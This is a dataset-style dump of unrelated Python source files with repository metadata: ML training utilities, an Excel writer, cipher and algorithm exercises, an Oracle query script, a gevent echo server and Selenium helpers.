from __future__ import division
from __future__ import print_function
import os
import logging
import time
from collections import namedtuple
from pathlib import Path
import torch
import torch.optim as optim
import torch.nn as nn
def create_logger(cfg, cfg_name, phase='train'):
root_output_dir = Path(cfg.OUTPUT_DIR)
# set up logger
if not root_output_dir.exists():
print('=> creating {}'.format(root_output_dir))
root_output_dir.mkdir()
dataset = cfg.DATASET.DATASET + '_' + cfg.DATASET.HYBRID_JOINTS_TYPE \
if cfg.DATASET.HYBRID_JOINTS_TYPE else cfg.DATASET.DATASET
dataset = dataset.replace(':', '_')
model = cfg.MODEL.NAME
cfg_name = os.path.basename(cfg_name).split('.')[0]
final_output_dir = root_output_dir / dataset / model / cfg_name
print('=> creating {}'.format(final_output_dir))
final_output_dir.mkdir(parents=True, exist_ok=True)
time_str = time.strftime('%Y-%m-%d-%H-%M')
log_file = '{}_{}_{}.log'.format(cfg_name, time_str, phase)
final_log_file = final_output_dir / log_file
head = '%(asctime)-15s %(message)s'
logging.basicConfig(filename=str(final_log_file),
format=head)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
console = logging.StreamHandler()
logging.getLogger('').addHandler(console)
tensorboard_log_dir = Path(cfg.LOG_DIR) / dataset / model / \
(cfg_name + '_' + time_str)
print('=> creating {}'.format(tensorboard_log_dir))
tensorboard_log_dir.mkdir(parents=True, exist_ok=True)
return logger, str(final_output_dir), str(tensorboard_log_dir)
def get_optimizer(cfg, model):
optimizer = None
if cfg.TRAIN.OPTIMIZER == 'sgd':
optimizer = optim.SGD(
model.parameters(),
lr=cfg.TRAIN.LR,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WD,
nesterov=cfg.TRAIN.NESTEROV
)
elif cfg.TRAIN.OPTIMIZER == 'adam':
optimizer = optim.Adam(
model.parameters(),
lr=cfg.TRAIN.LR
)
return optimizer
def save_checkpoint(states, is_best, output_dir,
filename='checkpoint.pth'):
torch.save(states, os.path.join(output_dir, filename))
if is_best and 'state_dict' in states:
torch.save(states['best_state_dict'],
os.path.join(output_dir, 'model_best.pth'))
def get_model_summary(model, *input_tensors, item_length=26, verbose=False):
"""
:param model:
:param input_tensors:
:param item_length:
:return:
"""
summary = []
ModuleDetails = namedtuple(
"Layer", ["name", "input_size", "output_size", "num_parameters", "multiply_adds"])
hooks = []
layer_instances = {}
def add_hooks(module):
def hook(module, input, output):
class_name = str(module.__class__.__name__)
instance_index = 1
if class_name not in layer_instances:
layer_instances[class_name] = instance_index
else:
instance_index = layer_instances[class_name] + 1
layer_instances[class_name] = instance_index
layer_name = class_name + "_" + str(instance_index)
params = 0
if class_name.find("Conv") != -1 or class_name.find("BatchNorm") != -1 or \
class_name.find("Linear") != -1:
for param_ in module.parameters():
params += param_.view(-1).size(0)
flops = "Not Available"
if class_name.find("Conv") != -1 and hasattr(module, "weight"):
flops = (
torch.prod(
torch.LongTensor(list(module.weight.data.size()))) *
torch.prod(
torch.LongTensor(list(output.size())[2:]))).item()
elif isinstance(module, nn.Linear):
flops = (torch.prod(torch.LongTensor(list(output.size()))) \
* input[0].size(1)).item()
if isinstance(input[0], list):
input = input[0]
if isinstance(output, list):
output = output[0]
summary.append(
ModuleDetails(
name=layer_name,
input_size=list(input[0].size()),
output_size=list(output.size()),
num_parameters=params,
multiply_adds=flops)
)
if not isinstance(module, nn.ModuleList) \
and not isinstance(module, nn.Sequential) \
and module != model:
hooks.append(module.register_forward_hook(hook))
model.apply(add_hooks)
space_len = item_length
model(*input_tensors)
for hook in hooks:
hook.remove()
details = ''
if verbose:
details = "Model Summary" + \
os.linesep + \
"Name{}Input Size{}Output Size{}Parameters{}Multiply Adds (Flops){}".format(
' ' * (space_len - len("Name")),
' ' * (space_len - len("Input Size")),
' ' * (space_len - len("Output Size")),
' ' * (space_len - len("Parameters")),
' ' * (space_len - len("Multiply Adds (Flops)"))) \
+ os.linesep + '-' * space_len * 5 + os.linesep
params_sum = 0
flops_sum = 0
for layer in summary:
params_sum += layer.num_parameters
if layer.multiply_adds != "Not Available":
flops_sum += layer.multiply_adds
if verbose:
details += "{}{}{}{}{}{}{}{}{}{}".format(
layer.name,
' ' * (space_len - len(layer.name)),
layer.input_size,
' ' * (space_len - len(str(layer.input_size))),
layer.output_size,
' ' * (space_len - len(str(layer.output_size))),
layer.num_parameters,
' ' * (space_len - len(str(layer.num_parameters))),
layer.multiply_adds,
' ' * (space_len - len(str(layer.multiply_adds)))) \
+ os.linesep + '-' * space_len * 5 + os.linesep
details += os.linesep \
+ "Total Parameters: {:,}".format(params_sum) \
+ os.linesep + '-' * space_len * 5 + os.linesep
details += "Total Multiply Adds (For Convolution and Linear Layers only): {:,} GFLOPs".format(flops_sum/(1024**3)) \
+ os.linesep + '-' * space_len * 5 + os.linesep
details += "Number of Layers" + os.linesep
for layer in layer_instances:
details += "{} : {} layers ".format(layer, layer_instances[layer])
return details
| [
"lxy5513@gmail.com"
] | lxy5513@gmail.com |
2954d8e87acd58471c0442c2ef128a0d55a74d62 | e00d8b1b7fc1d6425de2fe4538e84ccb9ccda452 | /itc/hebei_toll.py | 18b358874da6553e9bb06dd7a2c23613e0dbd413 | [] | no_license | yiruiduan/2018-07 | 64ffcc8988330bfd912bdf7f44d32ca3889a81d3 | 36471f3458abb96462021e3588ed2ebf9abfc739 | refs/heads/master | 2021-07-10T19:19:28.322710 | 2019-01-08T06:00:44 | 2019-01-08T06:00:44 | 135,425,614 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 812 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import xlwt
import re
workbook = xlwt.Workbook(encoding = 'ascii')
pattern = re.compile(u'[\u4e00-\u9fa5]+')
with open("河北北京天津收费站.txt","r",encoding="utf-8") as f:
for line in f:
if line.startswith("###"):
filterdata = re.findall(pattern, line)
worksheet = workbook.add_sheet(filterdata[0])
worksheet.write(0,1,label="所属高速")
worksheet.write(0, 2, label="高速名称")
i=1
if line.startswith("所属高速:"):
for j in range(3):
# print(j)
# print((line.strip().split(":")[j]))
worksheet.write(i,j,label=line.strip().split(":")[j])
i+=1
workbook.save("河北北京天津高速.xlsx")
| [
"yiruiduan@126.com"
] | yiruiduan@126.com |
bdd739e1d194e3350e8d261608f052aa2d1cd68a | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/atbash-cipher/780f7c2ca2024289b7e86d67c77cdb0a.py | f4cb4e0b4a787f169f151619ad13150dc07cb867 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 769 | py | import re
def decode(ciphertext):
plaintext = ''
for c in list(ciphertext):
if c.isalpha():
tmp = ord('z') - ord(c)
plaintext += chr(ord('a') + tmp)
elif c.isdigit():
plaintext += c
return plaintext
def encode(plaintext):
ciphertext = ''
temptext = ''
cs = list(plaintext.lower())
for c in cs:
if c.isalpha():
tmp = ord(c) - ord('a')
temptext += chr(ord('z') - tmp)
elif c.isdigit():
temptext += c
if len(temptext) > 5:
i = 0
for i in range(0, len(temptext) - 5, 5):
ciphertext += temptext[i:i+5] + ' '
ciphertext += temptext[i+5:]
else:
ciphertext = temptext
return ciphertext
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
0f7f10326711a4cf4fffb689aed806f4d12d3b06 | 632b94beca62f7c8af5ae1d1e8e095a352600429 | /build_isolated/moveit_commander/catkin_generated/pkg.develspace.context.pc.py | 74d5b57eac50e95ed76ceddf9025312701f4f5af | [] | no_license | Haoran-Zhao/US_UR3 | d9eb17a7eceed75bc623be4f4db417a38f5a9f8d | a0c25e1daf613bb45dbd08075e3185cb9cd03657 | refs/heads/master | 2020-08-31T07:02:45.403001 | 2020-05-27T16:58:52 | 2020-05-27T16:58:52 | 218,629,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "moveit_commander"
PROJECT_SPACE_DIR = "/home/haoran/US_UR3/devel_isolated/moveit_commander"
PROJECT_VERSION = "1.0.1"
| [
"zhaohaorandl@gmail.com"
] | zhaohaorandl@gmail.com |
81bffd876a4fdc0b34dd8eb8599fa803daf88a30 | bd8bc7abe0f774f84d8275c43b2b8c223d757865 | /368_LargestDivisibleSubset/largestDivisibleSubset.py | 0e89bdcccb45f3131c6fcbaaeee76f58dde3360f | [
"MIT"
] | permissive | excaliburnan/SolutionsOnLeetcodeForZZW | bde33ab9aebe9c80d9f16f9a62df72d269c5e187 | 64018a9ead8731ef98d48ab3bbd9d1dd6410c6e7 | refs/heads/master | 2023-04-07T03:00:06.315574 | 2021-04-21T02:12:39 | 2021-04-21T02:12:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | class Solution:
def largestDivisibleSubset(self, nums: List[int]) -> List[int]:
nums.sort()
# dp[i] 表示 nums[i] 的约数集合
dp = [[x] for x in nums]
ans = []
for i in range(len(nums)):
for j in range(i):
if nums[i] % nums[j] == 0 and len(dp[j]) + 1 > len(dp[i]):
dp[i] = dp[j] + [nums[i]]
if len(dp[i]) > len(ans):
ans = dp[i]
return ans
| [
"noreply@github.com"
] | excaliburnan.noreply@github.com |
f91fc4e82fe4ba7dd8fc849c4ffedc5c245bcd1a | 677fa54f9c8b48a813ff7b207817d1a3acc8ed25 | /main/lib/idds/tests/run_sql.py | 2e948042286c38b784fb2d53e1b239de536e453c | [
"Apache-2.0"
] | permissive | HSF/iDDS | 2a88cb35ebbf35c7e3427369a94c6b9d73c16182 | 193a95ec7ee154a2615fa8dcd99a79df5ddd3bec | refs/heads/master | 2023-08-31T11:10:10.410663 | 2023-08-25T14:03:17 | 2023-08-25T14:03:17 | 183,081,241 | 3 | 9 | NOASSERTION | 2023-09-14T11:55:03 | 2019-04-23T19:18:37 | Python | UTF-8 | Python | false | false | 1,990 | py | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0OA
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2019
"""
performance test to insert contents.
"""
import json
import cx_Oracle
from idds.common.config import config_get
# from idds.core.contents import add_content
def get_subfinished_requests(db_pool):
connection = db_pool.acquire()
req_ids = []
# sql = """select request_id from atlas_IDDS.requests where status in (4,5) and scope!='hpo'"""
sql = """select request_id from atlas_IDDS.requests where scope!='hpo' and ( status in (4,5) or request_id in (select request_id from atlas_idds.transforms where status in (4, 5) and transform_type=2)) order by request_id"""
sql = """select request_id from atlas_idds.collections where status=4 and total_files > processed_files order by request_id asc"""
sql = """select request_metadata, processing_metadata from atlas_idds.requests where request_id in (283511)"""
cursor = connection.cursor()
cursor.execute(sql)
rows = cursor.fetchall()
for row in rows:
# print(row)
# print(row[0])
data = json.loads(row[0].read())
print(json.dumps(data, sort_keys=True, indent=4))
req_ids.append(row[0])
cursor.close()
connection.commit()
db_pool.release(connection)
print(len(req_ids))
print(req_ids)
def get_session_pool():
sql_connection = config_get('database', 'default')
sql_connection = sql_connection.replace("oracle://", "")
user_pass, tns = sql_connection.split('@')
user, passwd = user_pass.split(':')
db_pool = cx_Oracle.SessionPool(user, passwd, tns, min=12, max=20, increment=1)
return db_pool
def test():
pool = get_session_pool()
get_subfinished_requests(pool)
if __name__ == '__main__':
test()
| [
"wguan.icedew@gmail.com"
] | wguan.icedew@gmail.com |
bee6572bdf3ba51f555860b1eca5428bf08419a8 | ce3bd1c0f8ecb9bbe41ded050c702a35e82191f5 | /khat3680_l04/src/t01.py | 96aab39ff0aa54e8740da4a33efec24ebb80e6df | [] | no_license | khat3680/Data_Sturct_Python | e368133d01cd790206f49e3f401b73961234955a | 4ae75031b3abf36119331064bb119061ae6cd586 | refs/heads/master | 2022-12-10T02:59:01.016483 | 2020-09-11T16:46:31 | 2020-09-11T16:46:31 | 294,755,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | """
-------------------------------------------------------
[program 1]
-------------------------------------------------------
Author: Anshul Khatri
ID: 193313680
Email: khat3680@mylaurier.ca
Section: CP164 Winter 2020
__updated__ = "2020-02-05"
-------------------------------------------------------
"""
from Food import Food
key_ = Food('Spring Rolls', 1, None, None)
print(key_) | [
"anshulskhatri@gmail.com"
] | anshulskhatri@gmail.com |
58cf908172c2c19f3b964ed05323f0906af4c37e | 5955ea34fd72c719f3cb78fbb3c7e802a2d9109a | /_STRUCTURES/String/deploy_str.py | b8cdf6f0aa4981933a3160534357a36a9727c468 | [] | no_license | AndreySperansky/TUITION | 3c90ac45f11c70dce04008adc1e9f9faad840b90 | 583d3a760d1f622689f6f4f482c905b065d6c732 | refs/heads/master | 2022-12-21T21:48:21.936988 | 2020-09-28T23:18:40 | 2020-09-28T23:18:40 | 299,452,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | first = input("Введите первую букву :")
last = input("Введите последнюю букву :")
newStr = ""
while first <= last:
newStr += first
first = chr(ord(first)+ 1)
print(newStr)
| [
"andrey.speransky@gmail.com"
] | andrey.speransky@gmail.com |
62c04ba164efc46580a8e29802b2c3105d28e244 | 114c1f7ceff04e00591f46eeb0a2eb387ac65710 | /g4g/DS/Graphs/Introductions_and_traversals/10_prac.py | b8308399c38cc993c17302967aa9c44a0beebb89 | [] | no_license | sauravgsh16/DataStructures_Algorithms | 0783a5e6dd00817ac0b6f2b856ad8d82339a767d | d3133f026f972f28bd038fcee9f65784f5d3ea8b | refs/heads/master | 2020-04-23T03:00:29.713877 | 2019-11-25T10:52:33 | 2019-11-25T10:52:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | ''' Iterative DFS '''
class Graph(object):
def __init__(self, vertices):
self.V = vertices
self.adj = [[] for i in range(self.V)]
def add_edge(self, src, dest):
self.adj[src].append(dest)
def DFS_Util(self, s, visited):
stack = []
stack.append(s)
while len(stack) != 0:
s = stack.pop()
if visited[s] == False:
print s,
visited[s] = True
i = 0
while i < len(self.adj[s]):
if visited[self.adj[s][i]] == False:
stack.append(self.adj[s][i])
i += 1
def dfs(self):
visited = [False] * self.V
for i in range(self.V):
if visited[i] == False:
self.DFS_Util(i, visited)
g1 = Graph(5)
g1.add_edge(1, 0)
g1.add_edge(0, 2)
g1.add_edge(2, 1)
g1.add_edge(0, 3)
g1.add_edge(1, 4)
g1.dfs() | [
"GhoshSaurav@JohnDeere.com"
] | GhoshSaurav@JohnDeere.com |
25b0c8725635d704fb1f7630816a948146eeb750 | 155fa6aaa4ef31cc0dbb54b7cf528f36743b1663 | /Polymorphism and Abstraction/wild_farm/animals/birds.py | 41ba401c5676fd4ca96f767957cdbdc132188929 | [] | no_license | GBoshnakov/SoftUni-OOP | efe77b5e1fd7d3def19338cc7819f187233ecab0 | 0145abb760b7633ca326d06a08564fad3151e1c5 | refs/heads/main | 2023-07-13T18:54:39.761133 | 2021-08-27T08:31:07 | 2021-08-27T08:31:07 | 381,711,275 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | from wild_farm.animals.animal import Bird
from wild_farm.food import Meat
class Hen(Bird):
weight_gainer = 0.35
def make_sound(self):
return "Cluck"
def feed(self, food):
self.weight += food.quantity * Hen.weight_gainer
self.food_eaten += food.quantity
class Owl(Bird):
weight_gainer = 0.25
def make_sound(self):
return "Hoot Hoot"
def feed(self, food):
if type(food) != Meat:
return f"{type(self).__name__} does not eat {type(food).__name__}!"
self.weight += food.quantity * Owl.weight_gainer
self.food_eaten += food.quantity
| [
"boshnakov.g@gmail.com"
] | boshnakov.g@gmail.com |
f47a10d8f4a3f749041c6241c6d0fd65b7ff1a94 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/296/78905/submittedfiles/testes.py | a1d13bb4b7617dba4b5f62c6fc00e07d617132c1 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
n = int(input("Digite o primeiro número: "))
m = int(input("Digite o segundo número: "))
soma = m + n
if soma>10:
print(soma)
else:
print("Não sei")
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
d7f3500c58054c8e787b5eb8b5ef526a6c1fb2a4 | a43346f397f55edf1f946bae937ae8ae9e21d955 | /vscode2/test_urllib.py | 83d06e098858b90cd428290a2f783d30dd67a847 | [] | no_license | OSYouth/vscode2 | 130474906566a3e90e9a60f5575b68453b4420ca | 385f3cc42b84abfdb958d23e56883450b73e5247 | refs/heads/master | 2021-10-19T11:22:26.210328 | 2019-02-20T15:19:35 | 2019-02-20T15:19:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | import urllib.request as urllib
url = "https://www.baidu.com"
print ('第一种方法')
response1 = urllib.urlopen(url)
print (response1.getcode())
print (len(response1.read())) | [
"benleolee@163.com"
] | benleolee@163.com |
35ed390982090e723108fa49c6bc3eca2fac169b | ffeedf288d6aa5302abf1771e23c3090b52d7676 | /filemapper/metadata/regex/regexsubtitleextension.py | ee29654357f444d8fda6bbadb7f510ddf6ff2567 | [] | no_license | AsiganTheSunk/python-multimedia-filemapper | f648577f610467abdb9e1ff43783fd1b8ec5b748 | 5daa07c51f3e85df48a0c336633ac150687fe24c | refs/heads/master | 2022-07-07T10:12:43.066571 | 2017-11-02T01:02:20 | 2017-11-02T01:02:20 | 98,677,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | import re
from filemapper.utils.fileflags import FileFlags as fflags
class RegexSubtitleExtension():
def __init__(self):
self.name = 'RegexSubtitleExtension'
self.supported_fflags = []
self.supported_season_fflags = []
self.supported_subtitle_fflags = [fflags.SUBTITLE_DIRECTORY_FILM_FLAG,
fflags.SUBTITLE_FILM_FLAG,
fflags.SUBTITLE_DIRECTORY_SHOW_FLAG,
fflags.SUBTITLE_SHOW_FLAG,
fflags.SUBTITLE_DIRECTORY_ANIME_FLAG,
fflags.SUBTITLE_ANIME_FLAG]
return
def get_subtitles_directory(self, stream, debug=False):
'''
This function retrieves the subtitle_directory of the file or directory from the stream using regular expresions
:param stream: It represents the input string you're parsing
:param debug: It represents the debug status of the function, default it's False
:return: SUBTITLE_DIRECTORY
'''
_subtitle_directory_patterns = ['(sub\w{0,6}(?!=\!))']
try:
subtitle_directory = re.search(_subtitle_directory_patterns[0], stream, re.IGNORECASE).group(0)
except AttributeError:
# raise error that would be corrected in ReEngine turning exception into blank field
subtitle_directory = ''
return subtitle_directory
else:
subtitle_directory = 'subs'
if debug:
print('{extension_engine}: {stream} :: {value}').format(
extension_engine=self.name,
stream=stream,
value=subtitle_directory)
return subtitle_directory
| [
"asiganthesunk@gmail.com"
] | asiganthesunk@gmail.com |
95c9ef6893aed8f628771d2758083ee20acee4bc | 9795fe1532849a046895cfb0d4b359144ad575dd | /stringtest.py | a2836ef585b1b18b6d2681aa68771ee248598116 | [
"MIT"
] | permissive | DBeath/python-snippets | 36e2df94d20227b897dd8c9345f9f0dfd733f96b | c9642c37183d947eb8a1a781e47bd70b1306d5ca | refs/heads/master | 2023-03-25T14:26:59.556635 | 2019-10-19T07:26:31 | 2019-10-19T07:26:31 | 118,523,453 | 0 | 0 | MIT | 2021-03-22T16:58:22 | 2018-01-22T22:22:16 | HTML | UTF-8 | Python | false | false | 237 | py | string = ''
print(string is None)
print(not string)
print(string is '')
print(string is not '')
if string:
print('String is true')
else:
print('String is false')
print()
string = 'Test'
print(string is None)
print(not string)
| [
"davidgbeath@gmail.com"
] | davidgbeath@gmail.com |
7f9e5d09226cfa9f68d090ddab27a9197d586658 | d7ec67a5ba315103fa6a6bae6dc045f1fecf7add | /normal/FluentPython_code_master/ch03_dict_set/strkeydict0.py | a2dc7df2040e476b3431f97d2ab8bc19527f2a50 | [] | no_license | munezou/PycharmProject | cc62f5e4278ced387233a50647e8197e009cc7b4 | 26126c02cfa0dc4c0db726f2f2cabb162511a5b5 | refs/heads/master | 2023-03-07T23:44:29.106624 | 2023-01-23T16:16:08 | 2023-01-23T16:16:08 | 218,804,126 | 2 | 1 | null | 2023-02-28T23:58:22 | 2019-10-31T15:57:22 | Jupyter Notebook | UTF-8 | Python | false | false | 1,702 | py | '''
StrKeyDict0 converts non-string keys to `str` on lookup
# BEGIN STRKEYDICT0_TESTS
Tests for item retrieval using `d[key]` notation::
>>> d = StrKeyDict0([('2', 'two'), ('4', 'four')])
>>> d['2']
'two'
>>> d[4]
'four'
>>> d[1]
Traceback (most recent call last):
...
KeyError: '1'
Tests for item retrieval using `d.get(key)` notation::
>>> d.get('2')
'two'
>>> d.get(4)
'four'
>>> d.get(1, 'N/A')
'N/A'
Tests for the `in` operator::
>>> 2 in d
True
>>> 1 in d
False
# END STRKEYDICT0_TESTS
'''
# BEGIN STRKEYDICT0
class StrKeyDict0(dict): # <1>
def __missing__(self, key):
if isinstance(key, str): # <2>
raise KeyError(key)
return self[str(key)] # <3>
def get(self, key, default=None):
try:
return self[key] # <4>
except KeyError:
return default # <5>
def __contains__(self, key):
return key in self.keys() or str(key) in self.keys() # <6>
# END STRKEYDICT0
print('---< start main routine >---')
d = StrKeyDict0([('2', 'two'), ('4', 'four')])
print ('d[2] = {0}'.format(d['2']))
print ('d[4] = {0}'.format(d[4]))
'''
------------------------------------------
if index does not exist, occure error
------------------------------------------
'''
try:
print('d[1] = {0}'.format(d[1]))
except Exception as e:
print(e)
pass
finally:
pass
print()
print ('d.get("2") = {0}'.format(d.get('2')))
print ('d.get(4) = {0}'.format(d.get(4)))
'''
---------------------------------------------
--------------------------------------------
'''
print ('d.get(1, "N/A") = {0}'.format(d.get(1, 'N/A')))
print() | [
"kazumikm0119@pi5.fiberbit.net"
] | kazumikm0119@pi5.fiberbit.net |
e5ea4bf5ff824ea3b88eae215aa89ad3e1b1ff1d | 22b348a0d10519cb1f1da5e886fdf2d3c167cf5a | /myweb/test/gevent_/gevent_server.py | 40d3ecc084fb675cd69f19242f2558e09bd2b098 | [] | no_license | liuluyang/openstack_mogan_study | dab0a8f918ffd17e0a747715998e81304672b75b | 8624f765da7f5aa0c210f0fa945fc50cf8a67b9e | refs/heads/master | 2021-01-19T17:03:15.370323 | 2018-04-12T09:50:38 | 2018-04-12T09:50:38 | 101,040,396 | 1 | 1 | null | 2017-11-01T02:17:31 | 2017-08-22T08:30:22 | Python | UTF-8 | Python | false | false | 872 | py | #coding:utf8
import gevent
from gevent import monkey,socket
monkey.patch_all() #有IO才做时需要这一句
s = socket.socket(2,1) #用的都是gevent模块中的socket,但用法一样
#s.setsockopt(1,2,1)
s.bind(('',8080))
s.listen(1024)
print 'listening ...8080'
def func_accept():
while 1:
cs,userinfo = s.accept()
print('来了一个客户'+str(userinfo))
g = gevent.spawn(func_recv,cs) #每当有用户连接,增加一条协程
def func_recv(cs):
try:
while 1:
recv_data = cs.recv(1024)
print(recv_data) #程谁堵塞了,便会跳转至其他协程
if len(recv_data) > 0:
cs.send(recv_data)
else:
cs.close()
break
except:
print cs,'is cut connection'
#g1 = gevent.spawn(func_accept)
#g1.join()
func_accept()
| [
"1120773382@qq.com"
] | 1120773382@qq.com |
d0215f9d1c50b64bf0a063ec2baf631dfe83758c | 2b4790d77439d89ad27bdd04bac539283f0dd605 | /cookbook/chapter2/2.7_shortest_match.py | 49bb54fd123247134a394ad7b475f5859077f171 | [] | no_license | ajioy/python-ex | 9fde4bcfe35edeee5050365660a03bdb6b913da1 | 982a3cdf0de0e140faa4cb539f2961b311de2c2a | refs/heads/master | 2020-04-05T14:06:09.909935 | 2018-08-14T14:43:55 | 2018-08-14T14:43:55 | 59,105,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | import re
str_pat = re.compile(r'\"(.*)\"')
text1 = 'Computer says "no."'
print(str_pat.findall(text1))
text2 = 'Computer says "no." Phone says "yes."'
# 贪婪模式匹配,尽可能长的匹配
print(str_pat.findall(text2))
# 非贪婪匹,尽可能短的匹配
str_pat = re.compile(r'\"(.*?)\"')
print(str_pat.findall(text2))
| [
"ajioy@hotmail.com"
] | ajioy@hotmail.com |
383e36a92c9d5637fc3a45dc325ed151ff97d399 | 8d24fedcadec55acb90aa6eb98d2768a9edf9dba | /professional_browser_automation/elements/element.py | 7d307b17a1d410c53ece73603d055d3403e09961 | [
"Unlicense"
] | permissive | ikostan/ElegantBrowserAutomationWithPythonAndSelenium | bb0a839b775e0a4f6c51b9d8ff1b07cab1624409 | da087036d74a8fbaec3a2875dad5c45c2a85689c | refs/heads/master | 2020-06-24T12:28:38.152860 | 2019-07-29T06:35:29 | 2019-07-29T06:35:29 | 198,962,805 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import selenium
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Element:
def __init__(self, driver: selenium.webdriver, locator: tuple):
self._driver = driver
self._locator = locator
self._element = self._find()
def _find(self):
'''
Returns element if located else raises TimeOut exception
:return:
'''
return WebDriverWait(self._driver, 10).until(EC.presence_of_element_located(self._locator))
@property
def element(self):
return self._element
@property
def driver(self):
return self._driver
@property
def locator(self):
return self._locator
| [
"igorkostan@gmail.com"
] | igorkostan@gmail.com |
33a3d15ea5ee1796400d25807404e08938591741 | 83cb1b60faf90982aad32c5979856d6064c00e5b | /infra_validation_engine/utils/__init__.py | 3d7325c5de65d3772012e362ee86b426687bffe2 | [
"Apache-2.0"
] | permissive | boris-vasilev/simple_grid_infra_validation_engine | 25813b3bfa3f82c8bc964b4ac43089a4fea76015 | 66a1410ca42718d559fd12e1e99dbcbc64457645 | refs/heads/master | 2020-09-06T00:58:51.032918 | 2019-10-25T15:24:24 | 2019-10-25T15:24:24 | 220,265,468 | 0 | 0 | Apache-2.0 | 2019-11-07T15:14:21 | 2019-11-07T15:14:20 | null | UTF-8 | Python | false | false | 386 | py | def get_lightweight_component_hosts(augmented_site_level_config):
site_infrastructure = augmented_site_level_config['site_infrastructure']
output = []
for node in site_infrastructure:
node['host'] = "ssh://{fqdn}".format(fqdn=node['fqdn'])
output.append(node)
return output
def get_augmented_site_level_config_file(augmented_site_level_config):
pass | [
"imptodefeat@gmail.com"
] | imptodefeat@gmail.com |
a0af2852cda9a3447ca5115c38f0c38ee2d71b59 | b815438a597af24018277788200caf5da7c4a611 | /Python/Compare-the-Triplets.py | 958faa07f309af0d695639b148fd045d20c1b8ba | [] | no_license | Zahidsqldba07/HackeRank-1 | 0338fe204074a544b8f2510ba6702fc0f648e5e7 | 14a04e72d1599a4b8375623781a952dde323acaa | refs/heads/master | 2023-04-23T10:38:05.993784 | 2020-11-01T17:23:49 | 2020-11-01T17:23:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,160 | py | """
Alice and Bob each created one problem for HackerRank. A reviewer rates the two challenges, awarding points on a scale from 1 to 100
for three categories: problem clarity, originality, and difficulty.
We define the rating for Alice's challenge to be the triplet a = (a[0],a[1],a[2]), and the rating for Bob's challenge to be the triplet
b = (b[0],b[1],b[2]).
Your task is to find their comparison points by comparing a[0] with b[0], a[1] with b[1],and a[2] with b[2].
If a[i] > b[i] ,then Alice is awarded point.
If a[i] < b[i] ,then Bob is awarded point.
If a[i] = b[i] ,then neither person receives a point.
Comparison points is the total points a person earned.
Given a and b, determine their respective comparison points.
Function Description
Complete the function compareTriplets in the editor below. It must return an array of two integers, the first being Alice's score
and the second being Bob's.
compareTriplets has the following parameter(s):
a: an array of integers representing Alice's challenge rating
b: an array of integers representing Bob's challenge rating
Input Format
The first line contains 3 space-separated integers a[0], a[1] and, a[2] describing the respective values in triplet a.
The second line contains 3 space-separated integers b[0], b[1] and, b[2] describing the respective values in triplet b.
Output Format
Return an array of two integers denoting the respective comparison points earned by Alice and Bob.
Sample Input 0
5 6 7
3 6 10
Sample Output 0
1 1
Sample Input 1
17 28 30
99 16 8
Sample Output 1
2 1
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the compareTriplets function below.
def compareTriplets(a, b):
alice,bob =0,0
for i in range(3):
if a[i] > b[i]:
alice += 1
elif a[i] < b[i]:
bob += 1
return [alice,bob]
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
a = list(map(int, input().rstrip().split()))
b = list(map(int, input().rstrip().split()))
result = compareTriplets(a, b)
fptr.write(' '.join(map(str, result)))
fptr.write('\n')
fptr.close()
| [
"noreply@github.com"
] | Zahidsqldba07.noreply@github.com |
a8f7bb875473b5cc4537aa57b46d6f71ae1d2a84 | 9f3981ecd73bd45178013d441a1ef34f860def0b | /pos_bahrain/pos_bahrain/report/stock_balance_with_prices/stock_balance_with_prices.py | e773fbb9ebeb694178e7719130e9d7ba526b7a73 | [
"MIT"
